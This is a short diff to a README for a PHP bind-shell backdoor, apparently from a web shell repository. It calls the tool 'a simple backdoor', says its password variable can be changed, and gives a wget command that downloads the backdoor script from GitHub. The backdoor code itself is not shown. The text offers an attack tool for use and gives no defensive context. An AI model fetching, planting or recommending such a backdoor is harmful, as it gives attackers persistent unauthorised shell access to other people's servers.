sornram9254/WebShell/README.md

 # Bindshell

-This is a simple backdoor written in PHP.
-You can easely download it by using :
+This is a simple backdoor written in PHP, you can change the value of the $PASSWD in the file and put whatever you wan't, but remember : if you loose the password, you loose the shell.

+# Download :
 ```bash
 wget https://raw.githubusercontent.com/NullBrunk/PhpBindShell/main/PhpBindShell.php
 ```